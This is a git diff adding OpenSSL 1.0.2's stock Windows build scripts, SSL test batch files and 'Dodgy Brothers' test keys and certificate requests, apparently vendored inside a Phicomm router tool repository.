+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl nasm VC-WIN32 >ms\nt.mak
+perl util\mk1mf.pl dll nasm VC-WIN32 >ms\ntdll.mak
+perl util\mk1mf.pl nasm BC-NT >ms\bcb.mak
+
+perl util\mkdef.pl 32 libeay > ms\libeay32.def
+perl util\mkdef.pl 32 ssleay > ms\ssleay32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nt.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nt.bat
new file mode 100755
index 0000000..e2d525e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_nt.bat
@@ -0,0 +1,7 @@
+
+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl no-asm VC-NT >ms\nt.mak
+perl util\mk1mf.pl dll no-asm VC-NT >ms\ntdll.mak
+
+perl util\mkdef.pl libeay NT > ms\libeay32.def
+perl util\mkdef.pl ssleay NT > ms\ssleay32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64a.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64a.bat
new file mode 100755
index 0000000..8768dc6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64a.bat
@@ -0,0 +1,19 @@
+perl util\mkfiles.pl >MINFO
+
+cmd /c "nasm -f win64 -v" >NUL 2>&1
+if %errorlevel% neq 0 goto ml64
+
+perl ms\uplink-x86_64.pl nasm > ms\uptable.asm
+nasm -f win64 -o ms\uptable.obj ms\uptable.asm
+goto proceed
+
+:ml64
+perl ms\uplink-x86_64.pl masm > ms\uptable.asm
+ml64 -c -Foms\uptable.obj ms\uptable.asm
+
+:proceed
+perl util\mk1mf.pl VC-WIN64A >ms\nt.mak
+perl util\mk1mf.pl dll VC-WIN64A >ms\ntdll.mak
+
+perl util\mkdef.pl 32 libeay > ms\libeay32.def
+perl util\mkdef.pl 32 ssleay > ms\ssleay32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64i.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64i.bat
new file mode 100755
index 0000000..088f5e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/do_win64i.bat
@@ -0,0 +1,9 @@
+
+perl util\mkfiles.pl >MINFO
+perl ms\uplink-ia64.pl > ms\uptable.asm
+ias -o ms\uptable.obj ms\uptable.asm
+perl util\mk1mf.pl VC-WIN64I >ms\nt.mak
+perl util\mk1mf.pl dll VC-WIN64I >ms\ntdll.mak
+
+perl util\mkdef.pl 32 libeay > ms\libeay32.def
+perl util\mkdef.pl 32 ssleay > ms\ssleay32.def
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyCA.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyCA.ss
new file mode 100644
index 0000000..933c2cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyCA.ss
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBOwIBAAJBANA0C3pzP53CugsEhCYTjtVn2VD1BIuKb6LPXx1uOfY4d60QwA4I
+t34gmMaEVUkIbweO5A2d1YjYOcqw4cuxfcsCAwEAAQJAOT9WOKEfyN0WEpl3TJDs
+ITmgw2XbjhLOh1HFsW3xegWlaOuhL/wGamz7n7zzL/RQF3JP/VvpGk2F8VD9JhwT
+wQIhAPmqM3fLttBoCQuwQRdIPfB7Ps3THqx6N8AJ04z3I1ejAiEA1XyDd7bLpWrw
+/oA8CmR4b/KCGfvRwAL/Qej/rQliw7kCIQCYRzSvO8ScpuflhjKdZcXJuRJcbgnG
+f6Ejc5rh3xdiawIhALMmLdzEFNjXiSzIx5mg/kBTLUJIw5dx7GqO8B9xBORhAiA5
+oTN/hgvvrkkmRsHQpNBmzAEGBzhMEEq9lD6ZWrTSRg==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyU.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyU.ss
new file mode 100644
index 0000000..05d356e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/keyU.ss
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBANHuKqKzq/87iwfTb0Wl4SVWiB2hhmrGu3jAI1T4rVgF5Dfg8V4h
+h9QpzIEK2iomM7BFT9ecbcZHrxLyuYyaTsMCAwEAAQJBAIxtM6n4ZCJscxj+D13Y
+k13Fn3Gqvd6pJ3ijlj7dxh6tRBBQ3W9qmQflyvEc81giI2XtbVYBOEJKtJ1cWWZm
+gAkCIQDpEoOuc4KCI5ti6aMJvtxlXWNHbkXCxtbeIjH4+FnH9QIhAOaU3XVeWWOK
+PnnO87KniDjHQqWLnooivDGRK+FUKeDXAiEA2MjEvFVqFVvDIsxHPkBNROcI+Z6i
+ulkx76kErBtrfqUCIHN5uBLQZmngUPuFtiwRlLoCqJDphENfs+oK7vPQx4xPAiEA
+hnY2Ulrpld83IG6bUs95Loc8Fk81hez5YwmhsFEXVtk=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mingw32.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mingw32.bat
new file mode 100644
index 0000000..06b5733
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mingw32.bat
@@ -0,0 +1,90 @@
+@rem OpenSSL with Mingw32+GNU as
+@rem ---------------------------
+
+perl Configure mingw %1 %2 %3 %4 %5 %6 %7 %8
+
+@echo off
+
+perl -e "exit 1 if '%1' eq 'no-asm'"
+if errorlevel 1 goto noasm
+
+echo Generating x86 for GNU assember
+
+echo Bignum
+cd crypto\bn\asm
+perl bn-586.pl gaswin > bn-win32.s
+perl co-586.pl gaswin > co-win32.s
+cd ..\..\..
+
+echo DES
+cd crypto\des\asm
+perl des-586.pl gaswin > d-win32.s
+cd ..\..\..
+
+echo crypt
+cd crypto\des\asm
+perl crypt586.pl gaswin > y-win32.s
+cd ..\..\..
+
+echo Blowfish
+cd crypto\bf\asm
+perl bf-586.pl gaswin > b-win32.s
+cd ..\..\..
+
+echo CAST5
+cd crypto\cast\asm
+perl cast-586.pl gaswin > c-win32.s
+cd ..\..\..
+
+echo RC4
+cd crypto\rc4\asm
+perl rc4-586.pl gaswin > r4-win32.s
+cd ..\..\..
+
+echo MD5
+cd crypto\md5\asm
+perl md5-586.pl gaswin > m5-win32.s
+cd ..\..\..
+
+echo SHA1
+cd crypto\sha\asm
+perl sha1-586.pl gaswin > s1-win32.s
+cd ..\..\..
+
+echo RIPEMD160
+cd crypto\ripemd\asm
+perl rmd-586.pl gaswin > rm-win32.s
+cd ..\..\..
+
+echo RC5\32
+cd crypto\rc5\asm
+perl rc5-586.pl gaswin > r5-win32.s
+cd ..\..\..
+
+:noasm
+
+echo Generating makefile
+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl gaswin Mingw32 >ms\mingw32a.mak
+echo Generating DLL definition files
+perl util\mkdef.pl 32 libeay >ms\libeay32.def
+if errorlevel 1 goto end
+perl util\mkdef.pl 32 ssleay >ms\ssleay32.def
+if errorlevel 1 goto end
+
+rem copy ms\tlhelp32.h outinc
+
+echo Building the libraries
+mingw32-make -f ms/mingw32a.mak
+if errorlevel 1 goto end
+
+echo Generating the DLLs and input libraries
+dllwrap --dllname libeay32.dll --output-lib out/libeay32.a --def ms/libeay32.def out/libcrypto.a -lws2_32 -lgdi32
+if errorlevel 1 goto end
+dllwrap --dllname libssl32.dll --output-lib out/libssl32.a --def ms/ssleay32.def out/libssl.a out/libeay32.a
+if errorlevel 1 goto end
+
+echo Done compiling OpenSSL
+
+:end
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mw.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mw.bat
new file mode 100644
index 0000000..35e00a4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/mw.bat
@@ -0,0 +1,26 @@
+@rem OpenSSL with Mingw32
+@rem --------------------
+
+@rem Makefile
+perl util\mkfiles.pl >MINFO
+perl util\mk1mf.pl Mingw32 >ms\mingw32.mak
+@rem DLL definition files
+perl util\mkdef.pl 32 libeay >ms\libeay32.def
+if errorlevel 1 goto end
+perl util\mkdef.pl 32 ssleay >ms\ssleay32.def
+if errorlevel 1 goto end
+
+@rem Build the libraries
+make -f ms/mingw32.mak
+if errorlevel 1 goto end
+
+@rem Generate the DLLs and input libraries
+dllwrap --dllname libeay32.dll --output-lib out/libeay32.a --def ms/libeay32.def out/libcrypto.a -lws2_32 -lgdi32
+if errorlevel 1 goto end
+dllwrap --dllname libssl32.dll --output-lib out/libssl32.a --def ms/ssleay32.def out/libssl.a out/libeay32.a
+if errorlevel 1 goto end
+
+echo Done compiling OpenSSL
+
+:end
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/req2CA.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/req2CA.ss
new file mode 100644
index 0000000..d061fb2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/req2CA.ss
@@ -0,0 +1,29 @@
+Certificate Request:
+    Data:
+        Version: 0 (0x0)
+        Subject: C=AU, O=Dodgy Brothers, CN=Dodgy CA
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (512 bit)
+                Modulus (512 bit):
+                    00:d0:34:0b:7a:73:3f:9d:c2:ba:0b:04:84:26:13:
+                    8e:d5:67:d9:50:f5:04:8b:8a:6f:a2:cf:5f:1d:6e:
+                    39:f6:38:77:ad:10:c0:0e:08:b7:7e:20:98:c6:84:
+                    55:49:08:6f:07:8e:e4:0d:9d:d5:88:d8:39:ca:b0:
+                    e1:cb:b1:7d:cb
+                Exponent: 65537 (0x10001)
+        Attributes:
+            a0:00
+    Signature Algorithm: md5WithRSAEncryption
+        8d:15:e6:8e:49:0f:07:fb:e0:72:ad:f0:04:9a:c8:5d:e7:1b:
+        ed:99:c9:c3:3c:f5:8e:4d:a1:5e:e1:40:75:2c:24:f0:c6:dd:
+        10:87:35:26:1d:cc:79:3f:a2:c6:a0:04:c8:52:78:ed:26:32:
+        d3:1b:a7:cd:5e:8c:55:92:dd:88
+-----BEGIN CERTIFICATE REQUEST-----
+MIHzMIGeAgEAMDkxCzAJBgNVBAYTAkFVMRcwFQYDVQQKEw5Eb2RneSBCcm90aGVy
+czERMA8GA1UEAxMIRG9kZ3kgQ0EwXDANBgkqhkiG9w0BAQEFAANLADBIAkEA0DQL
+enM/ncK6CwSEJhOO1WfZUPUEi4pvos9fHW459jh3rRDADgi3fiCYxoRVSQhvB47k
+DZ3ViNg5yrDhy7F9ywIDAQABoAAwDQYJKoZIhvcNAQEEBQADQQCNFeaOSQ8H++By
+rfAEmshd5xvtmcnDPPWOTaFe4UB1LCTwxt0QhzUmHcx5P6LGoATIUnjtJjLTG6fN
+XoxVkt2I
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqCA.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqCA.ss
new file mode 100644
index 0000000..1f7138c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqCA.ss
@@ -0,0 +1,8 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIHzMIGeAgEAMDkxCzAJBgNVBAYTAkFVMRcwFQYDVQQKEw5Eb2RneSBCcm90aGVy
+czERMA8GA1UEAxMIRG9kZ3kgQ0EwXDANBgkqhkiG9w0BAQEFAANLADBIAkEA0DQL
+enM/ncK6CwSEJhOO1WfZUPUEi4pvos9fHW459jh3rRDADgi3fiCYxoRVSQhvB47k
+DZ3ViNg5yrDhy7F9ywIDAQABoAAwDQYJKoZIhvcNAQEFBQADQQA5DZSZgDXs8flG
+GZf4SGr8QpqkxSu9bZOYp/ySuz1khj7aupBrvZBmqZcZx4ZjAUN7UQpMWu2gyfKa
+mAiiLPFN
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqU.ss b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqU.ss
new file mode 100644
index 0000000..91cce59
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/reqU.ss
@@ -0,0 +1,8 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBCDCBswIBADBOMQswCQYDVQQGEwJBVTEXMBUGA1UEChMORG9kZ3kgQnJvdGhl
+cnMxEjAQBgNVBAMTCUJyb3RoZXIgMTESMBAGA1UEAxMJQnJvdGhlciAyMFwwDQYJ
+KoZIhvcNAQEBBQADSwAwSAJBANHuKqKzq/87iwfTb0Wl4SVWiB2hhmrGu3jAI1T4
+rVgF5Dfg8V4hh9QpzIEK2iomM7BFT9ecbcZHrxLyuYyaTsMCAwEAAaAAMA0GCSqG
+SIb3DQEBAgUAA0EAhB0p6LbiVq+XshLo5sBQN0rsROC1OgWrdS6ZUmMaigOKK069
+r1o+dGwbM5VCYGTZf0PW9OtGuArGct0laL5h4w==
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/speed32.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/speed32.bat
new file mode 100755
index 0000000..95f7ce9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/speed32.bat
@@ -0,0 +1,37 @@
+set makefile=ms\nt.mak
+
+perl Configure b
+del tmp\*.obj
+nmake -f %makefile%
+nmake -f %makefile%
+nmake -f %makefile%
+out\ssleay version -v -b -f >speed.1
+out\ssleay speed >speed.1l
+
+perl Configure bl-4c-2c
+del tmp\rc4*.obj tmp\bn*.obj tmp\md2_dgst.obj
+nmake -f %makefile%
+nmake -f %makefile%
+nmake -f %makefile%
+out\ssleay speed rc4 rsa md2 >speed.2l
+
+perl Configure bl-4c-ri
+del tmp\rc4*.obj
+nmake -f %makefile%
+nmake -f %makefile%
+nmake -f %makefile%
+out\ssleay speed rc4 >speed.3l
+
+perl Configure b2-is-ri-dp
+del tmp\i_*.obj tmp\rc4*.obj tmp\ecb_enc.obj tmp\bn*.obj
+nmake -f %makefile%
+nmake -f %makefile%
+nmake -f %makefile%
+out\ssleay speed rsa rc4 idea des >speed.4l
+
+type speed.1 >speed.log
+type speed.1l >>speed.log
+perl util\sp-diff.pl speed.1l speed.2l >>speed.log
+perl util\sp-diff.pl speed.1l speed.3l >>speed.log
+perl util\sp-diff.pl speed.1l speed.4l >>speed.log
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tenc.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tenc.bat
new file mode 100755
index 0000000..a4fa7f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tenc.bat
@@ -0,0 +1,14 @@
+rem called by testenc
+
+echo test %1 %2 %3 %4 %5 %6 
+%ssleay% %1 %2 %3 %4 %5 %6 -e -bufsize 113 -k test -in %input% -out %tmp1%
+%ssleay% %1 %2 %3 %4 %5 %6 -d -bufsize 157 -k test -in %tmp1% -out %out1%
+%cmp% %input% %out1%
+if errorlevel 1 goto err
+
+echo test base64 %1 %2 %3 %4 %5 %6 
+%ssleay% %1 %2 %3 %4 %5 %6 -a -e -bufsize 113 -k test -in %input% -out %tmp1%
+%ssleay% %1 %2 %3 %4 %5 %6 -a -d -bufsize 157 -k test -in %tmp1% -out %out1%
+%cmp% %input% %out1%
+
+:err
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tencce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tencce.bat
new file mode 100644
index 0000000..c8b1acd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tencce.bat
@@ -0,0 +1,19 @@
+rem called by testencce
+
+echo test %1 %2 %3 %4 %5 %6 
+cecopy %input% CE:\OpenSSL
+cerun CE:\OpenSSL\%ssleay% %1 %2 %3 %4 %5 %6 -e -bufsize 113 -k test -in \OpenSSL\%input% -out \OpenSSL\%tmp1%
+cerun CE:\OpenSSL\%ssleay% %1 %2 %3 %4 %5 %6 -d -bufsize 157 -k test -in \OpenSSL\%tmp1% -out \OpenSSL\%out1%
+del %out1% >nul 2>&1
+cecopy CE:\OpenSSL\%out1% .
+%cmp% %input% %out1%
+if errorlevel 1 goto err
+
+echo test base64 %1 %2 %3 %4 %5 %6 
+cerun CE:\OpenSSL\%ssleay% %1 %2 %3 %4 %5 %6 -a -e -bufsize 113 -k test -in \OpenSSL\%input% -out \OpenSSL\%tmp1%
+cerun CE:\OpenSSL\%ssleay% %1 %2 %3 %4 %5 %6 -a -d -bufsize 157 -k test -in \OpenSSL\%tmp1% -out \OpenSSL\%out1%
+del %out1% >nul 2>&1
+cecopy CE:\OpenSSL\%out1% .
+%cmp% %input% %out1%
+
+:err
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/test.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/test.bat
new file mode 100755
index 0000000..f490546
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/test.bat
@@ -0,0 +1,185 @@
+@echo off
+
+set test=..\ms
+set opath=%PATH%
+PATH=..\ms;%PATH%
+set OPENSSL_CONF=..\apps\openssl.cnf
+
+rem run this from inside the bin directory
+
+echo rsa_test
+rsa_test
+if errorlevel 1 goto done
+
+echo destest
+destest
+if errorlevel 1 goto done
+
+echo ideatest
+ideatest
+if errorlevel 1 goto done
+
+echo bftest
+bftest
+if errorlevel 1 goto done
+
+echo shatest
+shatest
+if errorlevel 1 goto done
+
+echo sha1test
+sha1test
+if errorlevel 1 goto done
+
+echo md5test
+md5test
+if errorlevel 1 goto done
+
+echo rc2test
+rc2test
+if errorlevel 1 goto done
+
+echo rc4test
+rc4test
+if errorlevel 1 goto done
+
+echo randtest
+randtest
+if errorlevel 1 goto done
+
+echo dhtest
+dhtest
+if errorlevel 1 goto done
+
+echo exptest
+exptest
+if errorlevel 1 goto done
+
+echo dsatest
+dsatest
+if errorlevel 1 goto done
+
+echo ectest
+ectest
+if errorlevel 1 goto done
+
+echo testenc
+call %test%\testenc openssl
+if errorlevel 1 goto done
+
+echo testpem
+call %test%\testpem openssl
+if errorlevel 1 goto done
+
+echo testss
+call %test%\testss openssl
+if errorlevel 1 goto done
+
+set SSL_TEST=ssltest -key keyU.ss -cert certU.ss -c_key keyU.ss -c_cert certU.ss -CAfile certCA.ss
+
+echo test sslv2
+ssltest -ssl2
+if errorlevel 1 goto done
+
+echo test sslv2 with server authentication
+%SSL_TEST% -ssl2 -server_auth
+if errorlevel 1 goto done
+
+echo test sslv2 with client authentication
+%SSL_TEST% -ssl2 -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2 with both client and server authentication
+%SSL_TEST% -ssl2 -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo test sslv3
+ssltest -ssl3
+if errorlevel 1 goto done
+
+echo test sslv3 with server authentication
+%SSL_TEST% -ssl3 -server_auth
+if errorlevel 1 goto done
+
+echo test sslv3 with client authentication
+%SSL_TEST% -ssl3 -client_auth
+if errorlevel 1 goto done
+
+echo test sslv3 with both client and server authentication
+%SSL_TEST% -ssl3 -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3
+ssltest
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with server authentication
+%SSL_TEST% -server_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with client authentication
+%SSL_TEST% -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with both client and server authentication
+%SSL_TEST% -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2 via BIO pair
+ssltest -bio_pair -ssl2
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with 1024 bit DHE via BIO pair
+ssltest -bio_pair -dhe1024dsa -v
+if errorlevel 1 goto done
+
+echo test sslv2 with server authentication via BIO pair
+%SSL_TEST% -bio_pair -ssl2 -server_auth
+if errorlevel 1 goto done
+
+echo test sslv2 with client authentication via BIO pair
+%SSL_TEST% -bio_pair -ssl2 -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2 with both client and server authentication via BIO pair
+%SSL_TEST% -bio_pair -ssl2 -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo test sslv3 via BIO pair
+ssltest -bio_pair -ssl3
+if errorlevel 1 goto done
+
+echo test sslv3 with server authentication via BIO pair
+%SSL_TEST% -bio_pair -ssl3 -server_auth
+if errorlevel 1 goto done
+
+echo test sslv3 with client authentication  via BIO pair
+%SSL_TEST% -bio_pair -ssl3 -client_auth
+if errorlevel 1 goto done
+
+echo test sslv3 with both client and server authentication via BIO pair
+%SSL_TEST% -bio_pair -ssl3 -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 via BIO pair
+ssltest -bio_pair
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with server authentication
+%SSL_TEST% -bio_pair -server_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with client authentication via BIO pair
+%SSL_TEST% -bio_pair -client_auth
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair
+%SSL_TEST% -bio_pair -server_auth -client_auth
+if errorlevel 1 goto done
+
+echo passed all tests
+goto end
+:done
+echo problems.....
+:end
+PATH=%opath%
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce.bat
new file mode 100644
index 0000000..2ab010b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce.bat
@@ -0,0 +1,234 @@
+@echo off
+
+cemkdir CE:\OpenSSL
+
+set test=..\ms
+set opath=%PATH%
+PATH=..\ms;%PATH%
+cecopy ..\apps\openssl.cnf CE:\OpenSSL
+set OPENSSL_CONF=\OpenSSL\openssl.cnf
+set HOME=\OpenSSL
+set CERUN_PASS_ENV=OPENSSL_CONF HOME
+
+rem run this from inside the bin directory
+
+rem Copy the DLL's (though they'll only exist if we're in out32dll)
+if exist libeay32.dll cecopy libeay32.dll CE:\OpenSSL
+if exist ssleay32.dll cecopy ssleay32.dll CE:\OpenSSL
+
+echo rsa_test
+call %test%\testce2 rsa_test
+if errorlevel 1 goto done
+
+echo destest
+call %test%\testce2 destest
+if errorlevel 1 goto done
+
+echo ideatest
+call %test%\testce2 ideatest
+if errorlevel 1 goto done
+
+echo bftest
+call %test%\testce2 bftest
+if errorlevel 1 goto done
+
+echo shatest
+call %test%\testce2 shatest
+if errorlevel 1 goto done
+
+echo sha1test
+call %test%\testce2 sha1test
+if errorlevel 1 goto done
+
+echo md5test
+call %test%\testce2 md5test
+if errorlevel 1 goto done
+
+echo md2test
+call %test%\testce2 md2test
+if errorlevel 1 goto done
+
+echo mdc2test
+call %test%\testce2 mdc2test
+if errorlevel 1 goto done
+
+echo rc2test
+call %test%\testce2 rc2test
+if errorlevel 1 goto done
+
+echo rc4test
+call %test%\testce2 rc4test
+if errorlevel 1 goto done
+
+echo randtest
+call %test%\testce2 randtest
+if errorlevel 1 goto done
+
+echo dhtest
+call %test%\testce2 dhtest
+if errorlevel 1 goto done
+
+echo exptest
+call %test%\testce2 exptest
+if errorlevel 1 goto done
+
+echo dsatest
+call %test%\testce2 dsatest
+if errorlevel 1 goto done
+
+echo testenc
+call %test%\testencce openssl.exe
+if errorlevel 1 goto done
+
+echo testpem
+call %test%\testpemce openssl.exe
+if errorlevel 1 goto done
+
+cecopy openssl.exe CE:\OpenSSL
+
+echo verify
+copy ..\certs\*.pem cert.tmp >nul
+cecopy cert.tmp CE:\OpenSSL
+cemkdir CE:\OpenSSL\certs
+rem cecopy ..\certs\*.pem CE:\OpenSSL\certs
+cecopy ..\certs\ca-cert.pem CE:\OpenSSL\certs
+cecopy ..\certs\dsa-ca.pem CE:\OpenSSL\certs
+cecopy ..\certs\dsa-pca.pem CE:\OpenSSL\certs
+cecopy ..\certs\factory.pem CE:\OpenSSL\certs
+cecopy ..\certs\ICE-CA.pem CE:\OpenSSL\certs
+cecopy ..\certs\ICE-root.pem CE:\OpenSSL\certs
+cecopy ..\certs\ICE-user.pem CE:\OpenSSL\certs
+cecopy ..\certs\nortelCA.pem CE:\OpenSSL\certs
+cecopy ..\certs\pca-cert.pem CE:\OpenSSL\certs
+cecopy ..\certs\RegTP-4R.pem CE:\OpenSSL\certs
+cecopy ..\certs\RegTP-5R.pem CE:\OpenSSL\certs
+cecopy ..\certs\RegTP-6R.pem CE:\OpenSSL\certs
+cecopy ..\certs\rsa-cca.pem CE:\OpenSSL\certs
+cecopy ..\certs\thawteCb.pem CE:\OpenSSL\certs
+cecopy ..\certs\thawteCp.pem CE:\OpenSSL\certs
+cecopy ..\certs\timCA.pem CE:\OpenSSL\certs
+cecopy ..\certs\tjhCA.pem CE:\OpenSSL\certs
+cecopy ..\certs\vsign1.pem CE:\OpenSSL\certs
+cecopy ..\certs\vsign2.pem CE:\OpenSSL\certs
+cecopy ..\certs\vsign3.pem CE:\OpenSSL\certs
+cecopy ..\certs\vsignss.pem CE:\OpenSSL\certs
+cecopy ..\certs\vsigntca.pem CE:\OpenSSL\certs
+cerun CE:\OpenSSL\openssl verify -CAfile \OpenSSL\cert.tmp \OpenSSL\certs\*.pem
+
+echo testss
+call %test%\testssce openssl.exe
+if errorlevel 1 goto done
+
+cecopy ssltest.exe CE:\OpenSSL
+cecopy ..\apps\server.pem CE:\OpenSSL
+cecopy ..\apps\client.pem CE:\OpenSSL
+
+echo test sslv2
+cerun CE:\OpenSSL\ssltest -ssl2
+if errorlevel 1 goto done
+
+echo test sslv2 with server authentication
+cerun CE:\OpenSSL\ssltest -ssl2 -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2 with client authentication
+cerun CE:\OpenSSL\ssltest -ssl2 -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2 with both client and server authentication
+cerun CE:\OpenSSL\ssltest -ssl2 -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3
+cerun CE:\OpenSSL\ssltest -ssl3
+if errorlevel 1 goto done
+
+echo test sslv3 with server authentication
+cerun CE:\OpenSSL\ssltest -ssl3 -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3 with client authentication
+cerun CE:\OpenSSL\ssltest -ssl3 -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3 with both client and server authentication
+cerun CE:\OpenSSL\ssltest -ssl3 -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3
+cerun CE:\OpenSSL\ssltest
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with server authentication
+cerun CE:\OpenSSL\ssltest -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with client authentication
+cerun CE:\OpenSSL\ssltest -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with both client and server authentication
+cerun CE:\OpenSSL\ssltest -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2 via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl2
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with 1024 bit DHE via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -dhe1024dsa -v
+if errorlevel 1 goto done
+
+echo test sslv2 with server authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl2 -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2 with client authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl2 -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2 with both client and server authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl2 -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3 via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl3
+if errorlevel 1 goto done
+
+echo test sslv3 with server authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl3 -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3 with client authentication  via BIO pair
